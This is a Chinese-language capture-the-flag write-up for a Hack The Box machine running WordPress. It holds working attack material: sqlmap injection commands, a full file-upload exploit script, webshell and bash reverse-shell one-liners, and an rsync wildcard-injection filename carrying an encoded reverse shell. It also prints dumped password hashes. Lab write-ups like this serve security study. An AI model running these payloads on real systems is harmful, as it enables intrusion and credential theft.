基本信息

端口扫描

22,80,443:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
$ nmap -sC -sV 10.10.11.149
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-14 14:20 CST
Nmap scan report for 10.10.11.149
Host is up (0.20s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 9d:f3:87:cd:34:75:83:e0:3f:50:d8:39:c6:a5:32:9f (RSA)
|   256 ab:61:ce:eb:ed:e2:86:76:e9:e1:52:fa:a5:c7:7b:20 (ECDSA)
|_  256 26:2e:38:ca:df:72:d4:54:fc:75:a4:91:65:cc:e8:b0 (ED25519)
80/tcp  open  http     Apache httpd
|_http-server-header: Apache
|_http-title: Did not follow redirect to https://phoenix.htb/
443/tcp open  ssl/http Apache httpd
| ssl-cert: Subject: commonName=phoenix.htb/organizationName=Phoenix Security Ltd./stateOrProvinceName=Arizona/countryName=US
| Not valid before: 2022-02-15T20:08:43
|_Not valid after:  2032-02-13T20:08:43
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache
| tls-alpn:
|   h2
|_  http/1.1
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-title: Did not follow redirect to https://phoenix.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.21 seconds

80/443

需要加hosts

1
10.10.11.149 phoenix.htb

wordpress && Forum

details里read blog,可以注册登录,是一个wordpress:

另外还有个forum,里面可以查看members得到一些用户名:

Asgaros Forum

直接查看源码可以知道forum是wp插件Asgaros Forum,1.15.12:

可以搜到相关漏洞:

sql注入

注入点就是subscribe_topic,直接sqlmap一把梭(非常慢,2.6的评分(做的时候是这个评分)就是这么来的):

知道是wordpress直接去dump wp_users 了,再去跑表太费时间了,破解出来phoenix密码,但登录还有2FA

1
2
3
4
5
6
7
8
sqlmap --url https://phoenix.htb/forum/?subscribe_topic=1 --level 3 --risk 3 --batch
sqlmap --url https://phoenix.htb/forum/\?subscribe_topic\=1 --level 3 --risk 3 --batch --dbs
sqlmap --url https://phoenix.htb/forum/\?subscribe_topic\=1 --level 3 --risk 3 --batch -D wordpress -T wp_users --dump
sqlmap --url https://phoenix.htb/forum/\?subscribe_topic\=1 --level 3 --risk 3 --batch -D wordpress -T wp_users -C user_login,user_pass --dump --threads 10

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

phoenix : phoenixthefirebird14

所以需要其他方式,例如通过插件,利用插件漏洞:

1
sqlmap --url https://phoenix.htb/forum/\?subscribe_topic\=1 --level 3 --risk 3 --batch -D wordpress -T wp_options -C option_value --where "option_name='active_plugins'" --dump

其中一个插件搜到相关漏洞:

webshell

利用插件漏洞获取shell,因为是https,需要修改exp, 在请求中添加verify=False,另外shell需要phtml格式:

reverse shell

webshell执行命令获取reverse shell:

1
https://phoenix.htb/wp-admin/shell.phtml?cmd=bash%20-c%20'exec%20bash%20-i%20%26%3E/dev/tcp/10.10.14.13/4444%20%3C%261'

databases

1
2
3
available databases [2]:
[*] information_schema
[*] wordpress

wp_users

1
2
3
4
5
6
7
8
9
10
11
12
Database: wordpress
Table: wp_users
[5 entries]
+------------+------------------------------------+
| user_login | user_pass                          |
+------------+------------------------------------+
| john       | $P$B8eBH6QfVODeb/gYCSJRvm9MyRv7xz. |
| Phoenix    | $P$BA5zlC0IhOiJKMTK.nWBgUB4Lxh/gc. |
| Jane       | $P$BJCq26vxPmaQtAthFcnyNv1322qxD91 |
| Jsmith     | $P$BV5kUPHrZfVDDWSkvbt/Fw3Oeozb.G. |
| Jack       | $P$BzalVhBkVN.6ii8y/nbv3CTLbC0E9e. |
+------------+------------------------------------+

exp.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
# Exploit Title: Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/download-from-files
# Date: 10/09/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugins/download-from-files/
# Version: <= 1.48
# Tested on: Ubuntu 20.04.1 LTS (x86)

import os.path
from os import path
import json
import requests;
import sys

def print_banner():
	print("Download From Files <= 1.48 - Arbitrary File Upload")
	print("Author -> spacehen (www.github.com/spacehen)")

def print_usage():
	print("Usage: python3 exploit.py [target url] [php file]")
	print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")

def vuln_check(uri):
	response = requests.get(uri,verify=False)
	raw = response.text

	if ("Sikeres" in raw):
		return True;
	else:
		return False;

def main():

	print_banner()
	if(len(sys.argv) != 3):
		print_usage();
		sys.exit(1);

	base = sys.argv[1]
	file_path = sys.argv[2]

	ajax_action = 'download_from_files_617_fileupload'
	admin = '/wp-admin/admin-ajax.php';

	uri = base + admin + '?action=' + ajax_action ;
	check = vuln_check(uri);

	if(check == False):
		print("(*) Target not vulnerable!");
		sys.exit(1)

	if( path.isfile(file_path) == False):
		print("(*) Invalid file!")
		sys.exit(1)

	files = {'files[]' : open(file_path)}
	data = {
	"allowExt" : "php4,phtml",
	"filesName" : "files",
    "maxSize" : "1000",
    "uploadDir" : "."
	}
	print("Uploading Shell...");
	response = requests.post(uri, files=files, data=data , verify=False)
	file_name = path.basename(file_path)
	if("ok" in response.text):
		print("Shell Uploaded!")
		if(base[-1] != '/'):
			base += '/'
		print(base + "wp-admin/" + file_name);
	else:
		print("Shell Upload Failed")
		sys.exit(1)

main();

信息搜集

wp-config.php中获得数据库密码:

1
2
3
4
5
6
7
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'wordpress' );

/** MySQL database password */
define( 'DB_PASSWORD', '<++32%himself%FIRM%section%32++>' );

/etc/passwd中可以发现john用户,前面得到的hash破解出来的他的密码 superphoenix ,但直接切换也存在2FA:

查看/etc/pam.d/sshd配置,可以发现

1
auth [success=1 default=ignore] pam_access.so accessfile=/etc/security/access-local.conf

查看配置,发现只允许10.11.2.13/24 ssh:

所以是需要通过隧道,从eth0这个ip进行ssh

user flag

打通隧道,之后ssh连接

1
2
3
4
5
6
7
8
9
# local
./chisel_1.7.0-rc7_darwin_amd64 server -p 6969 --reverse

# target
./chisel_1.7.6_linux_amd64 client 10.10.14.13:6969 R:2222:10.11.12.13:22

# local
ssh editor@127.0.0.1 -p 2222
superphoenix

提权信息

/usr/local/bin里有个cron.sh.x

手动尝试运行,结合pspy64监控,可以发现调用rsync,使用通配符

1
rsync --ignore-existing -t *.* jit@10.11.12.14:/backups/

就是会通过rsync同步根目录backups里的文件,利用方式是常规gtfobins:

提权 && root flag

注意文件名需要有后缀,因为rsync命令用的是 *.*

1
2
3
4
5
6
7
8
9
cd /backups

/bin/bash -i >& /dev/tcp/10.10.14.13/4444 0>&1
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjEzLzQ0NDQgMD4mMQo=

echo "echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjEzLzQ0NDQgMD4mMQo= | base64 -d | bash" > shell.miao
touch -- "-e sh shell.miao"
chmod +x shell.miao
chmod +x -- '-e sh shell.miao'

( 这里图文件名有问题,失败的,懒得换新图了,注意前面说的,文件名需要有后缀)

等待执行(3分钟自动执行一次),我们自定义的命令成功被运行,得到root shell:

shadow

1
2
3
root:$6$U6DRf4846rMqwA5E$Bwo3RxRA1t15bx6xvX8fVZ1cNfMoFVkpwyoWcK2gz3HRX16/d.zqHlQI68v8drjuFWucpXhRYpIbnhg35.Vjc0:18944:0:99999:7:::
phoenix:$6$gLLB4KeGdb5Hnsc2$t6EYvvoh1DnVbPUbySB.0IVNgQicWBhS87fatD7umPj9PAKs8ZDvwHcrwp.dV/ZFnQDXCOc81pGrLcKyRuUtl0:19046:0:99999:7:::
editor:$6$CoywBsVPjctrApY9$P16ZwO5otTjkUm1B8kz8aKpgvC0mEK6g9Mq2wexdaRdF4kT3LuSM56R3BbJm28fp/39vUGJBRbPyw8r34PO1u/:19039:0:99999:7:::

参考资料